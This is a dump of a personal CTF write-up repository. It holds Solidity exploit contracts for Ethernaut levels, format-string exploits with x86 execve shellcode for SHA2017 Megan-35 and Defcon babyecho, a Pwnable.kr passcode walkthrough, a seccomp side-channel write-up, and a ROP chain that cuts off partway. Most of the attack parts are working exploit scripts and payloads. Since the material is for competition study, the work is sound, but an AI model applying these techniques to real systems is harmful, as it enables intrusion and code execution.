├── Ethernaut ├── lv3.sol ├── lv4.sol └── readme.md ├── Format String ├── SHA2017 Megan-35 │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── megan.png │ ├── readme.md │ └── solve.py ├── babyecho_defcon_2015 │ ├── exploit.py │ └── readme.md └── readme.md ├── GDB.md ├── Pwnable.kr ├── Passcode │ ├── passcode │ ├── passcode.c │ └── readme.md ├── cmd1.md ├── cmd2.md ├── random.md └── readme.md ├── README.md ├── ROP ├── 0ctf_blackhole │ ├── blackhole.tar.gz │ ├── readme.md │ └── solve.py ├── Bamboofox 2017 infant-go │ ├── infant-gogogo.py │ ├── infant-gogogo.zip │ ├── infant-gotoheaven.py │ ├── infant-gotoheaven.zip │ └── readme.md ├── Bugsbunnyctf Pwn100 │ ├── pwn100 │ ├── readme.md │ └── solve.py ├── CSAW 2017 pwn 100 scv │ ├── libc-2.23.so │ ├── readme.md │ ├── scv │ └── solve.py ├── CSAW 2017 pwn 75 pilot │ ├── pilot │ ├── readme.md │ └── solve.py ├── Codegate_CTF_2018_Preliminary │ └── BaskinRobins31 │ │ ├── 4b9a5f57118bcfb6db1d0991af9e4159 │ │ ├── libc.so.6 │ │ └── solve.py ├── Defcon_crashme │ ├── readme.md │ ├── smashme │ ├── smashme.py │ └── smasm.txt ├── Defcon_r0pbaby │ └── readme.md ├── Insomni-hack teaser 2018 onecall │ ├── brute_force.py │ ├── onecall-efe64fb18c06fbc4ce1c2ae4e7679e14c19ac293d04bdbd13b7d6babe49728b8.tgz │ ├── readme.md │ └── solve.py ├── PicoCTF_2013_ROP_1_4 │ ├── rop1-fa6168f4d8eba0eb │ ├── rop1 │ │ ├── readme.md │ │ └── rop1.py │ ├── rop2-20f65dd0bcbe267d │ ├── rop2 │ │ ├── readme.md │ │ └── rop2.py │ ├── rop3-7f3312fe43c46d26 │ ├── rop3 │ │ ├── readme.md │ │ └── rop3.py │ └── rop4 ├── VXCTF 2nd EasyPWN │ ├── bof │ ├── readme.md │ └── solve.py ├── VXCTF 2nd EasyPWN2 │ ├── bof2 │ ├── libc.so.6 │ ├── readme.md │ └── solve.py └── readme.md ├── Reverse ├── ASIS_2018_babyc │ ├── babyc │ ├── babyc_1a00d836423d314578effc629e58fe3801851df8d9653d5da6a52d4da30ab993 │ ├── cfg.png │ ├── patched_bin │ └── solve.py ├── Bamboofox 2017 little-asm │ ├── little-asm-221bc5c8651806d8a039d5ff2a68bc5c7d9e3a20 │ ├── little-asm-impossible-9d4350fd9310c7bd83a1829825b0fd6491605f4c │ ├── little-asm-revenge │ ├── little-asm-revenge.py │ ├── little-asm.py │ ├── little_asm_impossible.py │ └── readme.md ├── CSAW 2017 rev 100 tablez │ ├── readme.md │ ├── solve.py │ └── tablez ├── TUCTF_2017_Unknown │ ├── readme.md │ └── solve.py └── UIUCTF_2018_Triptych │ ├── readme.md │ ├── solve.py │ └── triptych ├── Tools ├── SHA2017 asby -PE fuzzing │ ├── asby.exe │ ├── asby.py │ └── readme.md ├── heap.py └── readme.md ├── angr ├── BugsBunnyCTF 2017 rev150 │ ├── readme.md │ ├── rev150 │ └── solve.py ├── Codegate_CTF_2018_Preliminary │ └── RedVelvet │ │ ├── afbea1c0a463d63cd6f00389a3b2fe88 │ │ ├── byangr.py │ │ ├── readme.md │ │ └── solve.py ├── Google CTF 2016 google2016_unbreakable_0 │ ├── 1.png │ ├── 2.png │ ├── readme.md │ ├── solve_google_ctf_2016_0.py │ └── unbreakable-enterprise-product-activation ├── MeePwn CTF- Missing Hash │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── crackme2_fix4.exe │ ├── readme.md │ └── solve.py ├── VXCTF 2nd Simple REVERSE │ ├── readme.md │ ├── rev │ └── solve.py ├── cmu_bomb_lab_ref │ ├── bomb │ ├── bomb.py │ ├── bomb2.py │ ├── bomb_layer5.py │ ├── bomb_layer_4.py │ └── readme.md └── readme.md ├── angr_type └── Defcon_crackme1 │ ├── crackme1 │ └── readme.md ├── browser ├── 34C3_V9 │ ├── pwn.js │ └── readme.md ├── Blaze_CTF_2018_blazefox │ ├── 1.png │ ├── 2.png │ ├── 2_labelled.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── README.txt │ ├── blaze.patch │ ├── pwn.js │ └── readme.md ├── CONFidence_CTF_2020_Teaser_Chromatic_aberration │ ├── 1.jpg │ ├── 2.jpg │ ├── 3.jpg │ ├── 6d87044f837a59e649f6d799143aede299a3103e764f8c46c921c3ee16da773a_chromatic_aberration.7z │ ├── pwn_no_comment.js │ ├── pwn_with_logs.js │ ├── readme.md │ └── solved.js ├── CVE-2018-8372 │ └── pwn.js ├── Codegate_CTF_2017_Preliminary_jsworld │ ├── fuzzer │ │ ├── a.js │ │ ├── b.js │ │ └── solve.py │ ├── jsworld.zip │ ├── pwn.js │ └── readme.md ├── Codegate_CTF_2019_Preliminary_Butterfree │ ├── 7a45459c17c76c24ae18fe4870532939.zip │ ├── 90b70bfa992696d63140ca63fcb035cf.zip │ ├── ArrayPrototype_org.cpp │ ├── flag.png │ ├── readme.md │ ├── reverse_shell.js │ ├── solve.py │ └── solved_large.js ├── PlaidCTF_2018_Roll-a-d8 │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── 5.png │ ├── 6.png │ ├── 7.png │ ├── 8.png │ ├── d8_d97a796c6c189bbb350942ea5d92f4dd.tar.xz │ ├── pwn.js │ └── readme.md └── RealWorldCTF_2019_Accessible │ ├── accessible.zip.001 │ ├── accessible.zip.002 │ ├── accessible.zip.003 │ └── pwn.js ├── fuzzer.py ├── heap ├── 0CTF_2017_babyheap │ ├── 1.png │ ├── 2.png │ ├── babyheap_69a42acd160ab67a68047ca3f9c390b9 │ ├── libc-2.23.so │ ├── libc.so.6_b86ec517ee44b2d6c03096e0518c72a1 │ ├── readme.md │ └── solve.py ├── 0ctf_2018_babyheap │ ├── babyheap.tar.gz │ ├── readme.md │ └── solve.py ├── Bamboofox 2017 MagicBook │ ├── MagicBook.zip │ ├── readme.md │ └── solve.py ├── CSAW CTF 2017 auir │ ├── auir │ ├── libc-2.23.so │ ├── readme.md │ └── solve.py ├── CSAW CTF 2017 zone │ ├── libc-2.23.so │ ├── readme.md │ ├── solve.py │ └── zone ├── Codegate_CTF_2018_Preliminary │ └── SuperMarimo │ │ ├── 7ae39f9f3910ac6928dffc35a2b25548 │ │ ├── cg1.png │ │ ├── cg2.png │ │ ├── cg3.png │ │ ├── libc.so.6 │ │ ├── readme.md │ │ └── solve.py ├── Jarvis0J │ └── guestbook2 │ │ ├── readme.md │ │ └── solve.py ├── N1CTF_2018_vote │ ├── b8a4590d-9fee-4a34-8396-d63adac62a0d.zip │ ├── readme.md │ └── solve.py ├── POC2018_theori_speedrun │ ├── solve.py │ └── speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b ├── hacklu_2018_heapheaven2 │ ├── heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip │ └── solve.py ├── hitcon2016_house_of_orange │ ├── houseoforange_22785bece84189e632567da38e4be0e0c4bb1682 │ ├── libc.so.6_375198810bb39e6593a968fcbcf6556789026743 │ └── solve.py ├── hitcon2018_children_tcache │ ├── children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz │ └── solve.py ├── note │ └── New-Exploit-Methods-against-Ptmalloc-of-GLIBC │ │ ├── consol_poc1.c │ │ ├── consol_poc2.c │ │ ├── enlarge_infoleak_poc.c │ │ ├── enlarge_poc.c │ │ ├── image │ │ ├── 04_01.png │ │ ├── 04_02.png │ │ ├── 04_03.png │ │ ├── 04_04.png │ │ ├── 04_05.png │ │ └── readme.md │ │ ├── readme.md │ │ └── shrink_poc.c └── reference │ ├── 20170604ssmjp-170604135916.pdf │ ├── Glibc_Adventures-The_Forgotten_Chunks.pdf │ ├── bh-usa-07-ferguson-WP.pdf │ ├── glibcmalloc-110710054847-phpapp01.ppt │ ├── glibc内存管理ptmalloc源代码分析.pdf │ ├── malloc-150821074656-lva1-app6891.pdf │ ├── ptmalloc_camera.pdf │ └── readme.md ├── hidden_writing.py ├── kernel └── hacklu_2018_babykernel │ ├── baby_kernel_3460960b6fc99f8a90fba7397b5e4c46.7z │ └── readme.md ├── misc ├── SHA2017 CTF Rev100 Suspect File 1 │ ├── 1.png │ ├── 2.png │ ├── 3.png │ ├── 4.png │ ├── ida.png │ ├── nanase.png │ ├── readme.md │ └── suspectfile1.tgz ├── VXCTF 2nd Flag Checking Oracle 2 │ ├── fco_v2.0.py │ ├── readme.md │ └── solve.py └── polictf2017 Status box-120 │ ├── readme.md │ └── statusbox.py ├── pattc_list.txt └── web └── UIUCTF └── Bot_Protection_IV ├── 0.jpg ├── 1.jpg ├── 10.jpg ├── 11.jpg ├── 12.jpg ├── 13.jpg ├── 14.jpg ├── 15.jpg ├── 2.jpg ├── 3.jpg ├── 4.jpg ├── 5.jpg ├── 6.jpg ├── 7.jpg ├── 8.jpg ├── 9.jpg ├── FDSEJ.png ├── JGGSS.png ├── JPSCB.png ├── PTJYZ.png ├── UZNXF_54629.png ├── VJGJJ.png ├── YJKYY.png ├── chall.jpg ├── charset.jpg ├── comment.jpg ├── ensemble_learning.jpg ├── failure.jpg ├── lv169.jpg ├── lv225.jpg ├── mainpage.jpg ├── model1.jpg ├── readme.md ├── solve.py ├── solved.jpg └── unzip.jpg /Ethernaut/lv3.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract CoinFlip { 4 | uint256 public consecutiveWins; 5 | uint256 lastHash; 6 | uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; 7 | 8 | function CoinFlip() public { 9 | consecutiveWins = 0; 10 | } 11 | 12 | function flip(bool _guess) public returns (bool) { 13 | uint256 blockValue = uint256(block.blockhash(block.number-1)); 14 | 15 | if (lastHash == blockValue) { 16 | revert(); 17 | } 18 | 19 | lastHash = blockValue; 20 | uint256 coinFlip = blockValue / FACTOR; 21 | bool side = coinFlip == 1 ? true : false; 22 | 23 | if (side == _guess) { 24 | consecutiveWins++; 25 | return true; 26 | } else { 27 | consecutiveWins = 0; 28 | return false; 29 | } 30 | } 31 | } 32 | 33 | contract exploit{ 34 | uint256 lastHash; 35 | uint256 FACTOR = 57896044618658097711785492504343953926634992332820282019728792003956564819968; 36 | CoinFlip contact; 37 | 38 | function exploit(){ 39 | contact = CoinFlip(contract_address); 40 | } 41 | 42 | function flip1() public returns (bool){ 43 | uint256 blockValue = uint256(block.blockhash(block.number-1)); 44 | 45 | if (lastHash == blockValue) { 46 | revert(); 47 | } 48 | lastHash = blockValue; 49 | uint256 coinFlip = blockValue / FACTOR; 50 | bool side = coinFlip == 1 ? true : false; 51 | contact.flip(side); 52 | return true; 53 | } 54 | 55 | } 56 | -------------------------------------------------------------------------------- /Ethernaut/lv4.sol: -------------------------------------------------------------------------------- 1 | pragma solidity ^0.4.18; 2 | 3 | contract Telephone { 4 | 5 | address public owner; 6 | 7 | function Telephone() public { 8 | owner = msg.sender; 9 | } 10 | 11 | function changeOwner(address _owner) public { 12 | if (tx.origin != msg.sender) { 13 | owner = _owner; 14 | } 15 | } 16 | } 17 | 18 | 19 | 20 | contract exploit{ 21 | Telephone contact; 22 | function exploit(){ 23 | contact = Telephone(contract_sol); 24 | } 25 | 26 | 27 | function get_owner() public { 28 | contact.changeOwner(your_eth_address); 29 | } 30 | 31 | } 32 | -------------------------------------------------------------------------------- /Ethernaut/readme.md: -------------------------------------------------------------------------------- 1 | # Level 6 2 | 3 | mydata="dd365b8b" 4 | 5 | contract.sendTransaction({data:mydata}) 6 | 7 | -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/1.png -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/2.png -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/3.png -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/megan.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Format String/SHA2017 Megan-35/megan.png -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/readme.md: -------------------------------------------------------------------------------- 1 | # SHA2017 Megan-35 2 | 3 | 呢題其實唔難,如果比賽個陣熟canary,根本就係coding challenge同小學生加減數問題:0) 4 | 5 | 呢條問題主要係一個input megan-35 encrypted message,output decrypted message 嘅service 6 | 7 | 有format string bug 8 | 9 | 10 | 由於佢有開canary,我地可以寫爛個canary,check sec fail同printf, 跳返去main再input /bin/sh, run system("/bin/sh") 11 | 12 | 13 | 首先用ida搵 canary address: 14 | 15 | 16 | ![alt text](1.png) 17 | 18 | 19 | 20 | 用stack dump數到第135號位save左 canary,71號位開始save printf of decrypted message 21 | 22 | 23 | 24 | ![alt text](2.png) 25 | 26 | 27 | 28 | 由於提供libc同冇aslr,所以可以利用GOT再寫printf去71號位,揾libc offset,再搵返system server side address: 29 | 30 | 31 | ![alt text](3.png) 32 | 33 | 不過由於直接讀%71$p 只會出返個printf got address,所以要send 70個%, 再dereference 71號位by %s 34 | 35 | ```python 36 | #dereference by %s 37 | 38 | payload+='%p'*70+'--'+'%s' 39 | 40 | printf_addr=int(r.recv(1024).split('--')[-1][:4][::-1].encode('hex'),16) 41 | 42 | ``` 43 | 44 | 之後就寫stack_check_fail做main,寫printf做system 45 | 46 | 47 | 48 | 最後一步,寫canary 49 | 50 | ![alt text](2.png) 51 | 52 | 53 | 係stack dump一眼就見到139號位有個近似stack address嘅物體 54 | 55 | 56 | 於是用local 139 save個個address 減返canary address ($ebp-0x1c) 57 | 58 | 得到 0x34 59 | 60 | 61 | send %139$p 求server side 139 stored address, 62 | 63 | 64 | canary: 0xffffdd9c=0xffffddd0-0x34 65 | 66 | 67 | 68 | Format String payload 69 | 70 | ```python 71 | #Step 1 write stack chk fail to main 72 | payload =p32(stack_check_fail_got) 73 | payload+=p32(stack_check_fail_got+1) 74 | payload+=p32(stack_check_fail_got+2) 75 | payload+=p32(stack_check_fail_got+3) 76 | 77 | #Step 2 write printf to system 78 | payload+=p32(printf_got) 79 | payload+=p32(printf_got+1) 80 | payload+=p32(printf_got+2) 81 | payload+=p32(printf_got+3) 82 | 83 | #test arg 139 84 | #-0x34 85 | #address of canary 86 | #send %139$p 87 | #return 0xffffddd0 88 | #from gdb, we know the difference between canary and %139$p is 0x34, 89 | #so 0xffffdd9c=0xffffddd0-0x34 90 | 91 | payload+=p32(0xffffdd9c) 92 | 93 | #36 is the length of the payload above 94 | 95 | fmt= '%188c%71$hhn'# 0xe0-36=188 writen to position 71 96 | fmt+='%164c%72$hhn'# 0x84-0xe0= 97 | fmt+='%128c%73$hhn'# 0x04-0x84= 98 | fmt+='%4c%74$hhn'# 0x08-0x04 99 | 100 | #system_server=0xf7e53940 101 | fmt+='%56c%75$hhn'# 0x40-0x08= 102 | fmt+='%249c%76$hhn'# 0x39-0x40= 103 | fmt+='%172c%77$hhn'# 0xe5-0x39= 104 | fmt+='%18c%78$hhn' # 0xf7-0xe5= 105 | 106 | #9 write canary 107 | fmt+='%11c%79$hhn' 108 | ``` 109 | 110 | 由於hhn 係根據%之前string 嘅length,再寫strelen去個address 111 | 112 | 加上canary頭一個byte係 \x00,所以求其寫d非0嘅野上去已經可以corrupt佢 113 | 114 | 115 | # Flag: 116 | ![alt text](megan.png) 117 | 118 | ``` 119 | flag{43eb404b714b8d22e1168775eba1669c} 120 | ``` 121 | 122 | 慘 123 | 124 | 125 | Reference 126 | ========================== 127 | 1.http://veritas501.space/2017/04/28/%E8%AE%BAcanary%E7%9A%84%E5%87%A0%E7%A7%8D%E7%8E%A9%E6%B3%95/ 128 | 129 | 2.https://hgarrereyn.gitbooks.io/th3g3ntl3man-ctf-writeups/content/2017/SHA2017CTF/problems/pwnable/megan-35/ 130 | 131 | 3.https://b0tchsec.com/2017/sha2017/megan-35 132 | 133 | 4.https://chung96vn.blogspot.hk/2017/08/sha2017-write-up-pwn-200.html 134 | 135 | 5.https://github.com/L4ys/CTF/blob/master/sha_2017/pwn200/exp.py 136 | 137 | -------------------------------------------------------------------------------- /Format String/SHA2017 Megan-35/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | import base64 4 | import binascii 5 | 6 | 7 | #flag{43eb404b714b8d22e1168775eba1669c} 8 | 9 | char_megan35 = "3GHIJKLMNOPQRSTUb=cdefghijklmnopWXYZ/12+406789VaqrstuvwxyzABCDEF5" 10 | char_base64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=" 11 | char_map = dict(zip(char_base64, char_megan35)) 12 | 13 | def m35encode(s): 14 | b = base64.b64encode(s) 15 | return ''.join([char_map[x] for x in b]) 16 | 17 | libc = ELF('libc.so.6') 18 | host = "megan35.stillhackinganyway.nl" 19 | port = 3535 20 | 21 | r = remote(host,port) 22 | #r=process('./babyecho') 23 | 24 | #----dump printf addr 25 | printf_got = 0x804A00C 26 | #r.recvuntil('encryption.\n') 27 | #payload = p32(printf_got) 28 | 29 | #dereference by %s 30 | #payload+='%p'*70+'--'+'%s' 31 | 32 | #r.sendline(m35encode(payload)) 33 | 34 | #convert the last 4byte to hex 35 | #printf_addr=int(r.recv(1024).split('--')[-1][:4][::-1].encode('hex'),16) 36 | 37 | #print 'printf addr: '+hex(printf_addr) 38 | printf_addr_=0xf7e62020 39 | #system = printf_addr_ - libc.symbols['printf'] + libc.symbols['system'] 40 | 41 | #print 'addr: '+hex(system) 42 | #----------------- 43 | 44 | #r.interactive() 45 | #log.info("system: " + hex(system)) 46 | #r.close() 47 | #system=printf-libc.symbols["printf"]+libc.symbols["system"] 48 | 49 | #saved in offset 71 50 | #canary is in 135 51 | 52 | main=0x080484E0 53 | printf_got = 0x804A00C 54 | stack_check_fail_got = 0x0804a018 55 | printf_addr_=0xf7e62020 56 | system_server=0xf7e53940 57 | 58 | 59 | #Step 1 write stack chk fail to main 60 | payload =p32(stack_check_fail_got) 61 | payload+=p32(stack_check_fail_got+1) 62 | payload+=p32(stack_check_fail_got+2) 63 | payload+=p32(stack_check_fail_got+3) 64 | #Step 2 write printf to system 65 | payload+=p32(printf_got) 66 | payload+=p32(printf_got+1) 67 | payload+=p32(printf_got+2) 68 | payload+=p32(printf_got+3) 69 | 70 | #test arg 139 71 | #0xffffddd0-0x34 72 | payload+=p32(0xffffdd9c) 73 | 74 | fmt= '%188c%71$hhn'# 0xe0-36= 75 | fmt+='%164c%72$hhn'# 0x84-0xe0= 76 | fmt+='%128c%73$hhn'# 0x04-0x84= 77 | fmt+='%4c%74$hhn'# 0x08-0x04 78 | 79 | #system_server=0xf7e53940 80 | 81 | fmt+='%56c%75$hhn'# 0x40-0x08= 82 | fmt+='%249c%76$hhn'# 0x39-0x40= 83 | fmt+='%172c%77$hhn'# 0xe5-0x39= 84 | fmt+='%18c%78$hhn' # 0xf7-0xe5= 85 | 86 | #9 write canary 87 | fmt+='%11c%79$hhn' 88 | 89 | payload_=payload+fmt 90 | 91 | r.recvuntil('encryption.\n') 92 | #test='%139$x' 93 | r.sendline(m35encode(payload_)) 94 | 95 | 96 | r.sendline(m35encode('/bin/sh')) 97 | 98 | 99 | 100 | 101 | r.interactive() 102 | 103 | 104 | #length of payload=16 105 | 106 | 107 | 108 | 109 | 110 | -------------------------------------------------------------------------------- /Format String/babyecho_defcon_2015/exploit.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | r=process('./babyecho') 4 | shellcode = "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80" 5 | 6 | r.recvuntil("\n") 7 | r.sendline('%5$p') 8 | # change the recevied word to hex 9 | no_7=int(r.recvline(keepends=False),16) 10 | esp=no_7-0x1c 11 | 12 | r.recvuntil("\n") 13 | #extend the buffer 14 | #esp+0x10 is the length of the buffer to 103 15 | r.sendline(p32(esp+0x10)+'%99x%7$n') 16 | 17 | r.recvuntil("\n") 18 | #extend the buffer 19 | #esp+0x10 is the length of the buffer to 103 20 | r.sendline(p32(esp+0x10)+'%999x%7$n') 21 | 22 | #reuse 23 | r.recvuntil("\n") 24 | payload = '' 25 | payload += p32(esp + 0x18) # $7 26 | payload += p32(esp + 0x42c) # $8 27 | payload += p32(esp + 0x42c + 1) # $9 28 | payload += p32(esp + 0x42c + 2) # $10 29 | payload += p32(esp + 0x42c + 3) # $11 30 | ptr = esp + 0x1c + len(payload) 31 | payload += shellcode 32 | initial_len = len(payload) 33 | payload += '%7$hhn' 34 | payload += ('%%%dd' % ((ord(p32(ptr)[0]) - initial_len) % 0x100 + 0x100)) + '%8$hhn' 35 | payload += ('%%%dd' % ((ord(p32(ptr)[1]) - ord(p32(ptr)[0])) % 0x100 + 0x100)) + '%9$hhn' 36 | payload += ('%%%dd' % ((ord(p32(ptr)[2]) - ord(p32(ptr)[1])) % 0x100 + 0x100)) + '%10$hhn' 37 | payload += ('%%%dd' % ((ord(p32(ptr)[3]) - ord(p32(ptr)[2])) % 0x100 + 0x100)) + '%11$hhn' 38 | r.sendline(payload) 39 | 40 | 41 | 42 | 43 | r.sendline('ls') 44 | r.interactive() 45 | -------------------------------------------------------------------------------- /Format String/babyecho_defcon_2015/readme.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | 14 | 15 | 16 | 17 | 18 | 19 | Reference: 20 | https://blog.skullsecurity.org/2015/defcon-quals-babyecho-format-string-vulns-in-gory-detail 21 | 22 | https://mzyy94.com/blog/2015/05/18/defcon-qual-23-writeup/ 23 | 24 | https://github.com/ctfs/write-ups-2015/tree/master/defcon-qualifier-ctf-2015/babys-first/babyecho 25 | 26 | https://github.com/VulnHub/ctf-writeups/blob/master/2015/defcon-quals/babyecho.md 27 | 28 | 29 | https://kimiyuki.net/blog/2016/01/08/defcon-qualifier-ctf-2015-babyecho/ <<<:" 8 | 9 | 08048360 : 10 | 11 | ... 12 | 13 | ... 14 | 15 | 080483a0 : 16 | 17 | 18 | #for offset 19 | 20 | $ objdump -R rop3-7f3312fe43c46d26 21 | 22 | 23 | DYNAMIC RELOCATION RECORDS 24 | 25 | OFFSET TYPE VALUE 26 | 27 | 08049ff0 R_386_GLOB_DAT __gmon_start__ 28 | 29 | 0804a000 R_386_JUMP_SLOT read 30 | 31 | 0804a004 R_386_JUMP_SLOT getegid 32 | 33 | 0804a008 R_386_JUMP_SLOT __gmon_start__ 34 | 35 | 0804a00c R_386_JUMP_SLOT __libc_start_main 36 | 37 | 0804a010 R_386_JUMP_SLOT write 38 | 39 | 0804a014 R_386_JUMP_SLOT setresgid 40 | 41 | 42 | radare2->i check canary 43 | 44 | check x/x $rbp and $rbp+4/+8 45 | -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/passcode: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/Pwnable.kr/Passcode/passcode -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/passcode.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void login(){ 5 | int passcode1; 6 | int passcode2; 7 | 8 | printf("enter passcode1 : "); 9 | scanf("%d", passcode1); 10 | fflush(stdin); 11 | 12 | // ha! mommy told me that 32bit is vulnerable to bruteforcing :) 13 | printf("enter passcode2 : "); 14 | scanf("%d", passcode2); 15 | 16 | printf("checking...\n"); 17 | if(passcode1==338150 && passcode2==13371337){ 18 | printf("Login OK!\n"); 19 | system("/bin/cat flag"); 20 | } 21 | else{ 22 | printf("Login Failed!\n"); 23 | exit(0); 24 | } 25 | } 26 | 27 | void welcome(){ 28 | char name[100]; 29 | printf("enter you name : "); 30 | scanf("%100s", name); 31 | printf("Welcome %s!\n", name); 32 | } 33 | 34 | int main(){ 35 | printf("Toddler's Secure Login System 1.0 beta.\n"); 36 | 37 | welcome(); 38 | login(); 39 | 40 | // something after login... 41 | printf("Now I can safely trust you that you have credential :)\n"); 42 | return 0; 43 | } 44 | 45 | -------------------------------------------------------------------------------- /Pwnable.kr/Passcode/readme.md: -------------------------------------------------------------------------------- 1 | Set break point at welcome 2 | 3 | 搵 name[100] address->ebp-0x70 4 | 5 | set at login 6 | 7 | 搵passcode1 ,passcode2 address 8 | 9 | passcode1:ebp-0x10 10 | passcode2:ebp-0xc 11 | 12 | EBP: 0xffffd3a8 --> 0xffffd3c8 13 | 14 | observed that EBP(base pointer) address is the same for two cases 15 | 16 | 0x70-0x10=96 17 | 18 | 19 | objdump -R passcode <-check GOT table for passcode 20 | 21 | 22 | use IDA pro find system address:080485E3 23 | 24 | 因為入完passcode1之後只有function run(scanf,printf,chk....)做過 25 | 26 | 所以,先疊高name,向passcode1寫入地址令passcode1指向(scanf,printf,chk....) 27 | 再input system address 28 | 29 | scanf("%d", passcode1); 5 | >Can get the flag from a [black hole](blackhole.tar.gz)? 6 | > 7 | >By the way, here is a so called [return-to-csu](https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf) method which you may want to know :P 8 | >(though personally thought this should be well-known in 2018) 9 | > 10 | >202.120.7.203:666 11 | > 12 | >In memory of Stephen William Hawking (1942–2018). 13 | 14 | 15 | 呢條係比賽solve唔到,之後睇其他writeup 加返d sleep上去就run到 ..... 16 | 17 | 其實我本身個solution都唔太可能solve得切,因為要brute force 一個半byte = 16^3 18 | 19 | Total =flag length * 16^3 * printable ascii char 20 | 21 | 呢題係Defcon Qual 2017 mute翻版,有seccomp, no output 22 | 23 | ``` 24 | # line CODE JT JF K 25 | # ================================= 26 | # 0000: 0x20 0x00 0x00 0x00000004 A = arch 27 | # 0001: 0x15 0x00 0x0d 0xc000003e if (A != ARCH_X86_64) goto 0015 28 | # 0002: 0x20 0x00 0x00 0x00000000 A = sys_number 29 | # 0003: 0x35 0x0b 0x00 0x40000000 if (A >= 0x40000000) goto 0015 30 | # 0004: 0x15 0x09 0x00 0x00000000 if (A == read) goto 0014 31 | # 0005: 0x15 0x08 0x00 0x00000003 if (A == close) goto 0014 32 | # 0006: 0x15 0x07 0x00 0x0000000a if (A == mprotect) goto 0014 33 | # 0007: 0x15 0x06 0x00 0x0000003c if (A == exit) goto 0014 34 | # 0008: 0x15 0x05 0x00 0x000000e7 if (A == exit_group) goto 0014 35 | # 0009: 0x15 0x00 0x05 0x00000002 if (A != open) goto 0015 36 | # 0010: 0x20 0x00 0x00 0x0000001c A = args[1] >> 32 37 | # 0011: 0x15 0x00 0x03 0x00000000 if (A != 0x0) goto 0015 38 | # 0012: 0x20 0x00 0x00 0x00000018 A = args[1] 39 | # 0013: 0x15 0x00 0x01 0x00000000 if (A != 0x0) goto 0015 40 | # 0014: 0x06 0x00 0x00 0x7fff0000 return ALLOW 41 | # 0015: 0x06 0x00 0x00 0x00000000 return KILL 42 | 43 | 44 | ``` 45 | 題目有一個bof, 可以用黎read ROP gadget,trigger mprotect 改變bss由 rw->rwx, input shellcode 去read flag 46 | 47 | 由於seccomp ban左 write, 所以要用side channel attack leak flag 48 | 49 | gadget 主要都係用 csu gadget (universal gadget) 50 | 51 | 52 | 呢條其實唔洗brute force ASLR都solve到, 因為alarm libc implementation 係用 syscall, 53 | 54 | 而read 會將input length pass 入eax,只要read 10 byte ->EAX /RAX = 0xa -> syscall 0xa ==mprotect 55 | 56 | 少改一下defcon mute d shellcode-> input shellcode to known bss->leak flag 57 | 58 | [solve.py](solve.py) 59 | 60 | 61 | # FLAG 62 | 63 | ``` 64 | flag{even_black_holes_leak_information_by_Hawking_radiation} 65 | ``` 66 | 67 | Again,in memory of Stephen William Hawking. 68 | 69 | # Reference 70 | 71 | 1. http://asiagaming.tistory.com/153 72 | -------------------------------------------------------------------------------- /ROP/Bamboofox 2017 infant-go/infant-gogogo.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process('./infant-gogogo') 4 | #nc bamboofox.cs.nctu.edu.tw 58795 5 | 6 | host = "bamboofox.cs.nctu.edu.tw" 7 | port = 58795 8 | r = remote(host,port) 9 | 10 | #gdb.attach(r) 11 | 12 | 13 | pop_rax_ret=0x0000000000404656 14 | syscall=0x00000000004520b9 15 | #0x0000000000485abd : pop rdi ; cmp dword ptr [rcx], eax ; add byte ptr [rax + 0x39], cl ; ret 16 | pop_rdi=0x0000000000485abd 17 | 18 | payload="A"*256 19 | #0x0000000000413d6d : pop rdx ; xor ah, byte ptr [rsi - 9] ; ret 20 | #0x0000000000408437 : pop rsi ; dec dword ptr [rax + 0x21] ; ret 21 | buf=0x0052e2a0 22 | rsi=0x0000000000408437 23 | rdx=0x0000000000413d6d 24 | 25 | #call read rdi :fd=0 26 | #rsi:buf 27 | #rdx:size 28 | #rax:0x00 29 | payload+=p64(pop_rax_ret)+p64(buf+0x200)+p64(pop_rdi)+p64(0x0)+p64(rsi)+p64(buf+0x300)+p64(rdx)+p64(0x8)+p64(pop_rax_ret)+p64(0)+p64(syscall) 30 